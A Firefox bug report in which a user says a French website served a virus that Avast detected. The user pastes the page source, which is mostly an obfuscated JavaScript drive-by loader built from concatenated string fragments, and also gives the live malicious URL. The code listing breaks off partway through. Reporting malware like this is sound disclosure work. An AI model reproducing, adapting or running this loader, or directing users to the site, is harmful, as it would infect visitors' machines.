Closed Bug 488177 Opened 16 years ago Closed 16 years ago

There's a virus that Firefox doesn't detect

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Platform:
x86
Windows Vista
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
VERIFIED INVALID

People

(Reporter: fanadejeu, Unassigned)

Details

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.4 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.4 If you go to this website : http://odile-marco.com/tomi/?t=2 You'll have a Virus ( The antiviruses Avast detects it ) Reproducible: Always Steps to Reproduce: 1.Go Here http://odile-marco.com/tomi/?t=2 Actual Results: You have a virus Expected Results: None This page contains the folowing code: <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <base href="http://odile-marco.com/tomi/?t=2"><div style="margin:-1px -1px 0;padding:0;border:1px solid #999;background:#fff"><div style="margin:12px;padding:8px;border:1px solid #999;background:#ddd;font:13px arial,sans-serif;color:#000;font-weight:normal;text-align:left">Ceci est le cache Google de <a href="http://odile-marco.com/tomi/?t=2" style="text-decoration:underline;color:#00c">http://odile-marco.com/tomi/?t=2</a>. Il s&#39;agit d&#39;un instantané de la page telle qu&#39;elle était affichée le 8 avr 2009 03:38:13 GMT. La <a href="http://odile-marco.com/tomi/?t=2" style="text-decoration:underline;color:#00c">page actuelle</a> peut avoir changé depuis cette date. <a href="http://www.google.com/intl/fr/help/features_list.html#cached" style="text-decoration:underline;color:#00c">En savoir plus</a><br><br><div style="float:right"><a href="http://74.125.77.132/search?q=cache:XCg7UXqXC34J:odile-marco.com/tomi/%3Ft%3D2+http://odile-marco.com/tomi/%3Ft%3D2&amp;hl=fr&amp;client=firefox-a&amp;hs=hIT&amp;gl=be&strip=1" style="text-decoration:underline;color:#00c">Version en texte seul</a></div> <div>Ces termes apparaissent uniquement dans les liens pointant sur cette page : <span style="font-weight:bold">http</span>&nbsp;<span style="font-weight:bold">odile</span>&nbsp;<span style="font-weight:bold">marco</span>&nbsp;<span style="font-weight:bold">com</span>&nbsp;<span style="font-weight:bold">tomi</span>&nbsp;<span style="font-weight:bold">t</span>&nbsp;<span style="font-weight:bold">2</span>&nbsp;&nbsp;</div></div></div><div style="position:relative"> <body><script>KMSEEB='';UMI='UR++]^=(x>>8)&255;W';OYN='mod(this.m);el';THP='ion I';PVP='YME.charAt(n)}func';NYP='x[i]>>15)*thi';XJK='P=52;A.proto';RRL=';a[--n';NFR='CodeAt(';FUG=',r);this.GSG(r)}P';HEN='pe.MKR=VPF;PGZ.proto';YGE='n c}function';DWL='b.LKZ(x);a[--n]=x[0]';WBQ='r k=(r[--i]=';ELM='=1;else if(';QLM='e;continue}mi=fa';KJT='/g,d2=(1<<this.F1)/';GPT='r h=c.';GRZ='}function nbv(i)';UXH='his.n=P';MRC='l&&N.leng';QML='is[i+';RYS=' y=nbi(),ts=';HSQ='his.UUT=null;th';GTO='0)z.ITN(r2';QGV='return this';FHV='j];this.S[j]=t}';CQX='t Exp';ODJ='ar r=n';QFL='));WQC[WUR++]=t>>>8';BSQ='".charCodeAt(0)';SYB='i=this.';QTT='a.encrypt(sss);n';SLX='=0)ret';IFW='>0)m=true;';QWR=';i<256;++i)this.S[i]';ITS='s[0]&0x80)!=0){this';NVR='j]++}}x.UGL();';RUU='extkey=res;var scr';YCV='=0)return;var b=this';SWI='r++]=vv;rr="A".c';SWO='ray();k+=a';QPN='ile(r[i]<--k)';KFB='){x=t;r+=8}if((t=x';HCZ='=(this.i+1)&255;this';TGF='r.t-1]+=x.am(i,x[';LZI='Math.floor(n/this.DB';DNL='f(r!=0)return ';CPT='="="||d.cha';XBW='otype.MVT=MTP;A.prot';HLT='peof a)this.';ZKZ='F2=2*B-BI_FP;var YME';RKZ=',b){k="';ISY='gator.appNam';ZTP='0x7fff';ZBH='0)r[i]';QFN='his.DV-y:-';KBD='="ABCDEFGHIJKLM';RHF='1)r[i++]=this.DV+c;';JWY='r){var a=m.abs()';UMY='KS(){}ZKS.p';ZMX='else retu';NNE='-1]|=(';SDS='rCode(b.cha';FSI='44ac1e154';JSH='next()}functi';PID='l,r);if(x.s<0&&r.D';RQZ='nction A(a,b,c){';ULP='null)';EQP='y}function PGZ(';CZR='23456789+/=';OYE='{a+=String.fro';JFP='.prototype.am=GPB;B';XKE='this.DB){this[thi';KUG='=c;r.';CLT='e.LGP=MYM;A.proto';TQX='(d.char';YMJ='totype.UCO=';MYO=';this.e=parse';JWT='(m.DB-15';QHX='is.t+n';OVZ='(d.charAt(i)=';YTG='=nbi();var';FMC='G(c,r);if(ts<0';VLC='his),i=';EUF='d,t);t.WOK(y,y);w';JWO='r(i=oil;';RTG='";if(isNaN(oi';XIG='"number"==ty';UNQ=',0,d))<k){y.IEZ(j';LIB='nt("script")';BHX='ction ZHW(){th';CFX='ebc08f71d';GTQ='56;va';QBE=' Array();var i=s';STU='GBI(r){va';CDX='.s=0;var i=s.leng';SHX='f)))&0xffff;y=(';MDZ='tion Z';LXR='?nbi():q;y.IEZ(j';ZMZ=')-1))<<(k-p);';ZSE='return"0"+h}RSAKe';FQR='le(this.t>0&&this[th';DFK='.t;++i){r[i-a-1]|=(t';JPT='.i]=t';VMN='(j+s[i])%256;x';NBM='+=this[i]-a[';XMO='=KPR;A.prototype.W';HIB='de63f573d739ec41';KWK='(x){x.U';CLK='=UGQ)WUR-=UGQ}func';WSF='c=(c==1?64:c/4';ONI='rseInt(b/c))';NTH='rn x}functio';VGI='f(oil';XGQ='i)r[i+x.t]=x.am(';OFW='fff}return c}if(EP';PIH='ring(d){a';VHQ='x>0)th';GUC=';t=th';GWH='n EGD(n,r){';TPJ='i<b;i++)';SPZ='.WOK(t,r);wh';GUP='hile(y.t<d)y[y.t++';JLC='ion JTL';ZWL='p+=this.DB-k';EDE='e.LKZ=KKNs;function';HXU='new EFS(';SNG='-1];if(f==0)return';JGD='ype.WOK=MVC;A.proto';QRK='=0,m=';TLI='oor(r[i]*h+(r[i-1]+';HHG='s,n){var a="";var';BNJ='his[i]&0x3fff;va';MPM='DJS(t)>=0){r[r.t++]=';CKC='75+Math.sin(oil)*21';FSZ='else if(c>0)r[i++]';DQY='o){var z=windo';BEK=')?-1:';NIG=',g,r);';LMW='return 0;var';DJY='s[this.t';GGE='ion ILN(n,';FOK='B(b){if';XZB='var a=x&0x7fff,xh=x>';IKJ='n/this.DB),c=';WXT='=0;i<t';WCI='nction XES(a){i';CQC='m(i+1,2*x[i],r,2*i+1';OEH=']=0;return ne';YFF=' k;if(b=';LNY=']&d)<<c;r[i-a]=this[';FNQ=']=0;while(--j>=0){va';HMD='r(vv=10';EXC='if(q!=nu';RMG='-b;var d=(1<<b)-1;';CHT='mCharCode(pa';ZVK=',256);else this.OXS(';YHP='tion MTP(){ret';YNF='NE;var r=nbi()';FHJ='his[i';QUR='s[j];s[j]=x;';WKO='.s=-1;if(sh>0)thi';JYO='EZ(this.m.t,';NPD='s.m)>=0)';UUR='=this[i];for(i=n-';DZE='*(2-(((x&0xffff)*y)&';DXV='(--n>=0)';UXE='){x=t';FSO='unction CKD(i,x,w,';NXX='type.GQ';TCL='b==16)k=4;e';MYY='>=0){var l=this[i]&0';XMT='g=f*(1<<this.F1)+((';SEX='0;r.UGL()}function';QGM='(2,BI_FP);A.prot';TCV='r h=this[i++';PDZ='5;this';QET='V(n,r){var a=n%thi';SIL='Key()';DSI='lse if(b==8)k=3';BKO='JTL(e)-1;g.LGP(';JFO='n,r){var i;for(i=t';SXX='tion JWX(';TTN='r!=0)return r;var';EEM='b==32)k=5;else if(';XRN='w.crypto.rand';XQR='is.mpl=this.m';LOL=' ci}YRX';LXF='{r.ULH(d,q)';VCX='.j=(this.j+t';PGD='r=thi';SHT='ci="";for(i=0;';WYE=';var i=x';MQG='r x=this.abs(';CWY='on VMR(e,z){if(e>0';CDE='="0123456789abc';VQF='ody.appe';JVX='m){th';MUI='type.G';OEW='r(var i=a+1;i<this';PMM=';else if(b==256)';KVV='while(i+n<s.length)';WKN='vigator.appName!="N';JKD='="";b=0;c=1;';JHY='this.t;var p=t';CBR='his.G';GWW='c+=St';HIQ='=x>>>16)!=0){x';LHI='G=HQJ;EFS.prototyp';COL='s.mpl)&th';YER='xffffffff||e<1)r';ERX=' m=xh*l+h*a';IDX='w A(a)}function RSA';QDI='JTL(a[';XCN='vv)VIB[r';JVO='sa=new R';LSN='WUR;function ';FCI='for(oil=0;oil<';CWN='Math.min(a.t,t';UUB='length);ci+=';BQB='=c;r.t=i;r.UGL';VEH='while(';UST='=x&255;WQC[W';GFS='tion DT';TQH='ing(i,s.';FDN='unction TCF(x,y,r){';MOR='x3fff,xh=x>>14;while';BWU=';scriptTag.src="?';VZL='=32)k=5;else if(b==4';HQC=' r}function VSI(s,';PVT='i<256;i++';DPK='L(this[this.';GCI=';for(y=0;y<';BSU='ator.a';SSS='FF(N,16)';UHD='y();while(n>2){x[';PQJ='s.S[i]+a[i%a.lengt';PPV='n LJY(x){r';LZD='ndChild(scri';SJE='y=(y*(2-(x&0x';FOC='-=a[i];r[i+';KXC='is.USF=null;thi';YCS='DB-sh))-1)<<sh}t';YHG='rCode(Math.floor(';USO='le(i>=0';SMR=']+=x.a';RHZ='DB}c+=this.s}else';GSY=')s[i]=i;';WJU=' a}';ITC='}function VSR(x){v';DSS='window.crypt';CFN='while(i>=0){if(p<';IGZ=',t);r';QDG='pe.ITN';LLX='his.m.t';FYD='QC[WUR++]^=(x>>16)&';XBI=']=x+D';EDH='LGP(y);b.LGP(r)}va';JSO=';vv<36;++vv)VIB[rr';HBG='sss+=Str';EGB='.s)A.DLK.WOK(r,r)}fu';FJK='.t;r.t=i+y.t;';CHH='h=this.mp>>1';SER='UDH(){if(this.t';GLV='x>>2)!=0){x=t';YIT='.charCodeAt(0)';VWP=');var i=r.';SZQ=']>>14';EIH='+]=c&this.DM;c>>=thi';WIN='x.DV){r[';WVS='w A(null)}f';OLQ=' if(EPQ&&(na';YNV=';var m=xh*l+h*a';NQI='7638eebb1f2381db61';ENX='Q&&(navig';VNX='i+x.t]-=x.DV;r[i+x.t';XHM='d|=this[--i]>>(';IWG='n}ret';DXC='return ';DWI='tion CTN(){X';YGO='6ff508b12d';XPT='.lengt';LJQ='<a.t){c';RJV='r[0]=this[a]>>b;fo';CZM='F2:0);var h=this.FV';THB='on XFD(N,E){if(N!';NEH='e.ITN';MRB='i();r.XRZ(i);return';MDX='functio';WXV='nopqrstuvwxyz01';UHG='f((e&(1<<i))>';ONB='0;for(i=';RWT='v<36;++';FLY='s.DM;c>>=this';MBG='!=0)return r;return ';YJP='xyz";var VIB=new A';CYI='GL()}functio';FGE='{var l=t';XKI='+]=z.charCodeAt(t';UHB=')A.DLK.WOK(r,r)}func';OIT='y.prototyp';BVE='Key.prototy';YOC='s.m,x)}func';VGH=')}r.t=d;r.UGL();';VVG='=16)k=';GYP='s.j=0}function G';HRE='tion GPB(i';JRN='(x&((1<<(this.DB-';UKW='turn(c==';ENJ='*h;w[j++]=l&0xffff';SKK='s-a.s;if(';DWB='<0&&r.DJS(A.DL';QOS='if(a!=null)if(';VRZ='=x[i]&';SDJ='urn c}f';MHT='eak;b';EQT='else{var t=r;r=r';LRU='pe.DM=((1<<B)-1);A';HKB='0xff)*y))&0xff;y=(y';BOI='f)==0xefcafe);fu';JTE='his.abs(),y=a.abs()';VVI='S(m){this.m=m}fun';YGR='3e1dd24a434';LWP='1)}';HGB='lse;if(sh==0)this[t';CYQ='r d=y.t;var f=y[d';MFY='=f)?this.DM:Math.fl';TJO='))-1;this.mt2=2*m.t';NIJ='his.S[this.j]';CMD=')}fun';CQQ='){var v=x*th';QLG='ile(i<thi';VCG='.um=(1<<';LOS='this.S[(t+this.S[t';RLH='j+s[i]+a.charCod';ITE='SAKey();rsa.set';DLS='ersion<"5"&&';PBP='t=2*x.t;while(--i';FZI='4;else if(b==';PCD='];r.t=this.t;r.s=th';UNC='eAt(i%a.length))%2';RMR='QC[WUR+';MTR=',i,0,this.m.t);';YHF='{j=(j+thi';VWT='e.IEZ=SPF;A.proto';ITK='tion QBR(x,';TPG='(l>>>30)+(m>>>1';RFY=';b%=c}';SOJ='XQM=JJX;EFS.';RJT='r);while(--i>=0){z.Y';ZQD=';r=USM(d)}';VSV='i=0;i<y.t;++';XBG=',m=false,r="",i=';ILZ='b){var k;if(';DTN=',n){if(n<s.length+';XTU='r b=new ZKS();var ';RCO='oil;i<256;i++)';XDX='-1;i>=0;--i)r[i+n]';IKV='his.S[this';IXM=';var a=';SJT='is.t-1';QVI='rototype.YPN=VGP;f';RRS=' d=(1<<b)';FSM='ing.fromCha';BND='r);r.UNQ(this.m,nul';FGQ='rototyp';GVR='&0x3fffffff);c=';NSH='<=0)return 0;retur';FMZ=' m?r:"';DZN='i]=this[i';JBW='(p-=k))&a;if(';DPH='.DJS=';PRR='ypt=XES;sss="";';EZW='NOPQRST';GUY='{c-=a.s;wh';GFW='new PG';CJF='his[i]>>p)>0){m=true';LKC='rn null}var a=new';OVJ=');w[j++]=l&0x3ffffff';PTZ=',b);retu';MQJ='null)?-1';BGJ='S.prototype.';LJY='8)!=0';ERH=':c}function';ZFX=';for(vv=0;vv<=9;++v';XEX='new A(a,r)}funct';QYD='>=0)r[i]=';SFO='var x=(k==8)?s[i]&0x';FCO='t=this.S[this.i];t';IZC='urn null;va';HEE='DV;return';JPY='}a[--n]=2';DQV='ype.WDW';HOH='or(WUR=0;W';VPX='="Microsoft In';LDI='urn((thi';NBN='is.i=0;this.j=0;th';ONM='ar r=nbi();x.ab';GKJ='=null}functi';UYZ='>>4)!=0){x=t;r+=4}';THC='==8&&(';WCE='(){var r=nbi();A.D';VDN='j];s[j]=x';OMU='return ';UGG='pe.UGL=';FGY='(x){var r=';UXP='a,null,r);if(this.s';LTJ='%256;j=';CSW='+]=x;else if(sh+k>';YSH='tion POE(a';WLZ='type.UL';XEU='0;if(c<-';GMF='e)*d2);if((r[i]+';UNE=']+s[j])%2';DHC='lorer"))';TCY='-1;var e=Math.floor(';TYT='this.i=0;thi';VCD='.am=CKD;B=26}else{A';XFK='r){var x=t';ZRG='56])}ret';QHI='this.DM;c>>=this.';CBB='nctio';SQK='ng(i,i+n)';BIY='iptTag=documen';JZB='DB=B;A.prototy';PGZ='his.i])&255]}Z';QWE='V;else this.t=0';EQD='this.DV))%this.';OYG='pt(a,b){retu';OBI='rray();var rr,';JEF='KR(r)}function';KWC='is.um)<<15))&x.DM;j';ZGG='ms)A.DLK.WOK(q,q';GJB='ILQ;A.prot';MBJ='g,e=1<<this.F';QBJ='=y.am(0,k,r,j';KTE='ey.prototype';LDB='>=0;--i){r[i';XQN='i],r,2*i,0,1);r.s=';EPB='LRF;A.prototyp';EOR='&E.length>0){t';TUT=')A.DLK.WOK(this,th';SOM='his.S[this.i])&255;';UUM='72362793f8';MQT='=i-d,t=(q==null)';TFF=' i=0;';DXF='s.t-a-1]|=(this.s&d)';CWU='ength;++WUR)WQC[';YOI='eturn ';PGF='e.mod=W';XPR='bi();this.abs().UNQ(';YQT='r CGS;var WQC;var ';KNM=')+7)>>3);if(m=';RLG='l;j=oil;c=""';XPY='r i=n;i<this.t;+';FKS='WOK(r,r);return r}f';GII=';for(vv=10;v';BZP='oil=0;func';LUZ='KS=BBV;A.prototype.X';JIV='l+((m&0x7fff)<<15';WPN='0;for(i=0;i<x';GJU='f)<<14)+w[j]+c';REU='));r';FLN='terne';TQK='>1){o';BHC='n OMZ(x,';ZFH='p&0x7f';SQI='otype.V';QNO='t(i)=="-")mi=tru';SPK='.t<this.t)';RQW='>=0)x.WOK(thi';HUZ='e.doPublic=ECY;RSAK';FHQ='=i;j=';YGM='f)*y))&0xf;y=(y*';JZL='for(i=0;i<d';LIQ='nbv(1);fun';PTK='is.DB)%k;if(i-->0';UZO=';r+=2}if((t=x>>1)!=0';TSZ='];if((x';LWK='s.DB*(this.t-1)+JT';ZJT='(t=0;t<z.length;';VQK='vv;rr="0"';OUC='D;A.prototype.ab';QVM='=null&&E!=nul';GRJ='0;--i)r[i]=0;r[e]';IMT=';r+=1}return r}fu';JCZ='S[this.j]=t;';HQO='while(x[j]>=x.DV){x[';CMV='3);a=ci};var m=KZE';KBR='.exp(e,z)}A.prototyp';HXB='PN(r,r2);i';SKE='1,t;if((t';MDE='x=s[i];s[i]=s[';WBB='VU(new Date()';RYC='p<=0){p+=t';GEH='t.createEleme';IQD='ND;A.protot';VUH='.t-1;++i){var c=x.am';VIJ='is.DM,i;for(i';HRN='=m.UCO();th';WYT='a.substr';YYW=',x,w,j,c,n){va';VMV='ff;this.mp';PXP='v)VIB[rr++]=vv;rr="a';QKG='x.LGP(r);this.GS';VQP='t(i)];re';VRG='x.GQY(r)';BQC='unction ILQ(){';IFV=')}A.ONE.IEZ(';LKO=')k=2;e';TDB='is.m=m;this.mp';QCX='ent.b';HNE='56;++i)';UCM='XI=QL';YHI='a.t-1]);if(c>0){a';JBM='if((t=';HQM='Radix(b)';BMC='.setPublic=';VVP='}return';QVZ='HW.prototype.init=P';MZW=')}else{d=(this[i]>>';ZIG='&1)==0)';OWU='GS==n';ZUE=' i=this.t;r=i-a.t;i';JDL='i,0,1);if((r[i+x.t';ETR='funct';RPK=',i,0,x.t);r.s=0;r.';MYP='is.s}funct';OPX='ll)q.X';NMV='is)}f';BVS='+e+1]=(this';DSQ=' new ZHW()}v';JRZ='x.ULH(this.m.t,x';GWP=' d=Math.floor(Math.';CKY='avigator.appV';LLB='>15;while(--n';IVT='th,mi=false,sh=0;';UWY='}WUR=0;CTN()}fu';TJJ='beefcafe&0xfffff';UYR='is.q=null;t';FMF=';if(a.t<';XZD='(1<<(this.';IGD='{this.n=null;th';LNF='NQ(this.m,null,x)}f';ZNY='s.DB}c-=a.s}r.s=(c<0';CFD='WDW(16);if((h.l';RZG='y();WUR=0;';TXE='UVWXYZabcdefghijklm';OTG='=t;r+=16}if((t=x>>';UJY=';A.pro';OYF='167e579053';KYD='r){x.GQY(r);t';VLY='eturn x}function HQJ';KNH=':0;if(';GIH='nction ';GKO='ction KPR(b){';WLW='(c,r)}else{a.';XDD='harCodeA';EMM='i]>>b}if(b>0)r[thi';PGV='XFD;RSA';VYK='Z(m);';RYU='.DB;var c=this.DB';HFX='=b*64+YRX.indexOf';ZGJ='(j*this.m';KTP='=OMZ;PGZ.prototype.Y';ESL='pe.encr';YDE='"\\n") br';RLI='his.DB-(i*th';BGO='s.DM;whi';ZNK='urn a+s.substr';YTR='th>0&';VIG='(t,r)}}if(q!=';FXN='ile(i';WDR='TN();CGS=GZG(';ZEP='is[this.t-1]|=x<';GHD='s.XOM';WBY=';l=a*';VGF='ototype';PXY='EN(){var t;this.i';VEI='(this.s<<a)&th';GHP='ar i;for';SXH='l;oil=0}s=new Ar';LXJ='var t;if(navi';XQP='){if(p<this.DB&&(d=t';UJN='s<0)?this.WXI():t';UMQ=']==c)--this.t}fun';FWZ='(r!=null';XGM='PGZ.prototy';JKM='&&n>0)a[--n]=s.char';MTV='2504bde1963c9';LCP='m);else z=';OUK='--i>=0){';GNZ='l)){k=oi';CZP=')&255}while(WUR<UGQ)';QWQ='prototype.MKR=LJY;';CUK='i=(i+1)';DOY='y,r){x.HFS(y';SGY=' if(b=';UUP='his.s;wh';RQG='+i)r[i-n]=thi';YDH='.WDW(16);';JSB='type.HFS=ELM;A.proto';ULD=';var a=(1<<k)-1,d';DCB='pl+(((j*this.mph+(';CSJ='i--);a[--n]=0;va';YSE='j,c,n){while(--n>=0';XIM='ction POI(a){var i';IMV='his.t-n,0);r.s=th';YGL='y*(2-x*y%';EJN='pe.UNQ=UJH;A.pro';TSQ='rn"-"+this.WXI(';CEV=';this.GSG(r)}EF';LXD='type.XRZ=QYW;A.prot';TVN='RZ(0);if';XUH='UGL();if(this.s!=a';JTU=' PFF(a,r){';DLU='return this.to';IVE=';var ';WXG='nction ';PNV='<<c;r.t=this.t-a;r.U';HZG='on YSJ(x){';SOC='F(){var c=this.s&thi';QIK='urn(this.';SDY='j]-=x.DV;x[++';MZZ='se retu';JGV='his.t';KEG='b==4)k=2;else ';KZX='t-1;i>=0;--i)r[';LFP='ype.BDU=MSB;A.DLK=';ERS=';l=a*l+((m&0x3ff';BXB='rn POE(a,';WQJ='s.t>0)?(this[0]&1)';TXM='on KKNs(a){v';YMZ='s,i){var c=VIB[s.c';HGN='rn 0;var x=this[0';MLR='[i]>>b)|c;c=(th';TUI='otype.F1=BI_FP-B';JHG='.DB}if(a';XNX='random(';EMK='gth;++i)a[i]=KK';KKD='h])&255';NBX='(i,x[i]';WGL='his[i++]>>15;var';NYS='.abs();if(b.t<a.t){';PON=';this.s=(x<0)?-1';UJS='m.am(0,a,x';ELB='k=8;else if(b==2)';XZW='{a+=s.substri';HIP='nbv(0);A.ONE=';XZO='unction r';XTM='&"string"!=typeof';XGS='eturn A.O';MZQ=';return}var b=n%this';BYE='otype.XQM=VSR;';SRZ='is.s}function BB';YEY='for(va';YIJ=' SEF(i,x,w,j,c,n){';YLT='etscape")){A.pr';MGS='f}return c}func';ZRN='0;WUR=0}return CGS.';YCU=';for(var i';HJO='0xfff';QTV='is.S=new Array(';ULZ='r.WOK';QQV='rAt(i)==';RSE='e.DV=(1<<B);var BI_F';FSN='k){d=(this[i]&((1<<p';KMU='ppName=';NJJ=' UJH(m,q,';DSN='(this.e,this.n)}fu';ZDU='.length-1;whi';GYG='otype.ex';RGT='p=VMR;A.protot';ZSM='totype.';EUE='(b<0x10)return"0"+b';XBQ='11){retu';EVB='x=new Arra';LYY='{A.prototype.am';SXS=')this.LGP(r);';IOS='x){var r=nbi();';GJW='t=this.t+e+1;r.s=t';HQN=';c=(l>>28)';VHO='(a,(this.n.VGH(';IYE=');if(c!=64)';UMB='=TCF;EFS.p';QCF='k=1;else';FBR='sh))-1))<<sh;this[th';POP='","10001");res=rs';JHI='his.t+';JTV='.DB-sh))}else th';EIO='++t)W';PSB='ar UGQ=2';QBX='(2-(x&';YGZ=':this.s)==0}functi';IVQ='ff:JWX(s,i)';BUO='e"&&n';JCP='his.t);while(i<m){c';TIR='Y=GBI;A.prototy';GTD='s.t-1]|=';FSD='his}funct';UIX='WUR]=';GBO=',c,x.t-i-1))>=';LWN=');if(x.DJS(this.m)';SSV='PN=QBR;func';EQK='a,b)}function nbi()';CIK='5)+xh*h+(c>>>30';XYJ='nction KKN(){if(C';MGO='53;oil++)';WXM=';WQC[WUR++]=t&255';RXN=';r.s=this.s}fu';VXM=');retur';LHB='e=="Netscap';RVX='if(m)r+=U';JTF='fromNumbe';UTN='if(c>0)r.XP';DNC='{var';SKW=';var c=this.doPub';UTV='urn h;else ';BMK='n MVC(a,r){var i=0,c';LZT='XVU(x){WQC[WUR++]^';NVM='s.t){c+=this[i];r[i+';MES='is.t++]=(x>>(this';EPJ='2)x[x.t++]=0';PTB=',j,t;for(i=0';DMS='his.UGL();if(mi';RIB='8)k=3;else if(b==2)k';LDU='=this.t-1;i';CDQ='{return ne';UTD=',r2=nbi(),g=z.XQM(t';LHQ='ction JJX(x)';NIU=');CGS.init(WQC);f';MVR='=SEF;B=30}else';WLR='x>>24)&255;if(WUR>';NFF='{t=Math';JQJ='56;';LCT=' MSB(e,m){var z;';YCJ='<<a}for(i=e-1;i>=';CYY='ull){C';JIO='GZ.prot';VRE='+(m>>14)+xh';ZUW='{j=(';RDI='s.fromRadix(s';ITW='G(r);return r}functi';UVR='(i=0;i<a.len';XNC='x7fff;var h=t';CBX='x.HFS(y,r);this.';SVL='s[i];r.t=';DUD='unction VPF(';IGP='is.d=null;this';MXF='.floor(65536*Math.';DJB='SM(d)}}return';ZLD='+1]=1}}if(r.t>0)r[';TUN='.getTime())}if';NOR='t-1]^(this.s&this.D';UGL='Math.max(t';MNS='defghijklmnopqrstuvw';JLW='b890473b297';NTW='=i+this.';YTM='0,y[i],r';QOM='K)>0)a.WOK(r,r);ret';LMR='type.FV=Math.pow';HPY='H=EGD;A.prototype.L';ZHX='lic(m);if(c';TBM='d>1)?y[d-2]>>this.';BHY='.prototyp';LCS='s().I';GBT='At(i));';UYY='h+=k;if(sh>=this';PYI='ion QYW(x){this.t=1';ECE='()}funct';MUX='YS(a){var r=this.';NSX='return x.';HVU=')+w[j]+(c';GPX='}i=oi';CVZ='xt=GEN;function GZG';EPR='his.DB;--i}}if(d';DJD='f(x<-1)this[0';JQP='is[0]=';JDJ='2dfdb29';TPB='PG=ILN;A.protot';ECO='harCodeAt(0);fo';VEZ='ECY(x){return x.BDU';WKF='00);w[j++]=v&';CUD='m.t;x[j]+=this.';TNG='QC=new Arra';ZXB='GSG(r)}functi';JYX='{if(x.s<0||x.DJS(thi';VBF='if(e<256||m.MVT())z=';ZMC=' null';RWO='n KZE(s';MNH=',r,2*';JVP='c=this.DB-';QHV='on VGP(x,r){';MVG='0"}function QLD';KWX='return}if(r==null)r';ERP='s.S[i]=this.S[';YRQ='i];r[i++]=c&thi';WYR='+]=c&';QEU='255;WQC[WUR++]^=(';FBO='.LKS(c,y);b.LKS';LQY='0}funct';WJP='unction LR';WVM='{var j';BJX='SG=YSJ;PGZ.p';YPJ='.prototy';YWB=' y=x&3;';JYR='is.e=0;th';XRW='n thi';MPE='h;i++){if';BJI='s.DB;var b';IIU='while(x.t<=this.mt';YBX=');if(a>=this';NFH='ptTag);';FGI='r){r.s=this.s;var a=';EHJ='ength&1)=';PBX='+]+w[j]+c;c=M';WCF='rCodeAt(y)^s[(s[i';IEI='ion GFM(';MYV='lse{thi';BUM='0]=0;while(x[0]==0)';FCW='on hexToSt';DNJ='=28}A.prototype.';UEX='random()*a.';QDJ='2;r2=t}}return z.M';KTM='OI;ZHW.prototype.ne';NOT='b.length;y++){';JDY='il=MWB(YRX,5';HTI='om(32);for';JME=' a)this.OXS(a';LUH=';if(ts!=';CRQ='is.S[i];thi';BOU='urn r}function EF';KKH='ion ELM(a,';FJH=';a=k;fo';VWB='otype.OXS=VSI;A';RDP='-i)r[i]=0;r.t=th';ELP='if(this.t<1)retu';VTX='this.s,ms=m.s;var ';EVV='JS(A.DLK)>0)this.m.';MDN='"+res;docum';MPT='is[i]&d)';FBY='rn}this.t=0;this';BGG='LK.WOK(this,r';HVL='(WQC==null){W';MRE='s[i]-a[i])';URW='r a=x&0';DCT='(){return';WKP='c4Decry';ULK='length)}func';YEJ='ring.fromCha';PJM='Int(E,16)}}function ';DGB='{var r=nb';VKD='if(this.s<0)retu';DFZ='+"\\n";i+=';OOR='0;i<2';JWF='==null)ret';XGU='.p=null;th';WXE='r;while(--i>=0)if((';BES='Public("c1f4';CLM='=0;for(';TJM='else if(b==null&';ONX='IYS;A.prot';GIC=';this.';YGG='b)}EPQ=((0xdead';ZYV='=this.DB-a;var';FRK='x;else i';XWW='rototy';OBX='=s[i];s[i]=';OXG='0x3ffffff}retur';JSJ='his.s;r.UGL()}';NVB=' MYM(r){for(var ';ZVE='1;r.WOK(t,r';IFG='N()}func';MDU='ction USM(n){r';WGP='";functi';SCU='.DB)sh-=this.DB}if(k';LEU='++]=vv;fun';EDS='s=QVO;A.prototype';ZKB='r(a,b,c);';WJH='SG(r)}functio';HER='GH=UDH;A.prototyp';LEC='j=oil;for(i=';UEE='.t){r.t=0';FHH='nction QVO(){ret';GYE='=null)return';NFK='{c+=t';SXL='rn b.WDW(16)}functio';CKZ='while(--i>=';PPP=';if(x<0){if(s.charA';WLV='<sh;s';UDZ=';++i)';PEE='ing(d,d+';QCS='1;i>=0;-';WOG='EFS.prototype.GS';BLZ='M))}function SPF(';CJK='n r}fu';DZP='ath.floor(v/0x40000';GSR=').WDW(b);var';WIU='UR<WQC.l';SQY='tion WND(a){v';ZYK='2;var i=r.t,j';MYM='return';CLP=',t);if(r.';KNF='(y>0)?t';JQK='n MWB(a,b){';KMSEEB+=MDX+JQK+SHT+TPJ+DNC+GWP+UEX+UUB+WYT+PEE+LWP+MYM+LOL+KBD+EZW+TXE+WXV+CZR+WGP+FCW+PIH+JKD+JZL+XPT+MPE+OVZ+CPT+QQV+YDE+MHT+HFX+TQX+GBT+WSF+IYE+OYE+CHT+ONI+RFY+VVP+WJU+BZP+YSH+RKZ+RTG+GNZ+SXH+SWO+FJH+JWO+PVT+GSY+LEC+RCO+ZUW+RLH+UNC+JQJ+MDE+VDN+GPX+RLG+GCI+NOT+CUK+LTJ+VMN+OBX+QUR+GWW+YEJ+SDS+WCF+UNE+ZRG+SDJ+XZO+WKP+OYG+BXB+YGG+TJJ+BOI+RQZ+QOS+XIG+HLT+JTF+ZKB+TJM+XTM+JME+ZVK+EQK+CDQ+WVS+FSO+YSE+CQQ+QML+PBX+DZP+WKF+OXG+YGE+YIJ+XZB+LLB+MYY+XNC+WGL+ERX+WBY+JIV+HVU+GVR+TPG+CIK+OVJ+MGS+HRE+YYW+URW+MOR+DXV+FGE+BNJ+TCV+SZQ+YNV+ERS+GJU+HQN+VRE+ENJ+OFW+ENX+BSU+KMU+VPX+FLN+CQX+DHC+LYY+MVR+OLQ+WKN+YLT+VGF+VCD+JFP+DNJ+JZB+LRU+BHY+RSE+XJK+LMR+QGM+TUI+UJY+ZSM+ZKZ+CDE+MNS+YJP+OBI+VQK+YIT+ZFX+PXP+BSQ+GII+RWT+XCN+SWI+ECO+HMD+JSO+LEU+MDU+YOI+PVP+SXX+YMZ+XDD+VQP+UKW+MQJ+ERH+NVB+SYB+KZX+DZN+PCD+MYP+PYI+PON+KNH+VHQ+JQP+FRK+DJD+XBI+QWE+GRZ+DGB+MRB+HQC+ILZ+TCL+DSI+PMM+ELB+QCF+SGY+VZL+LKO+M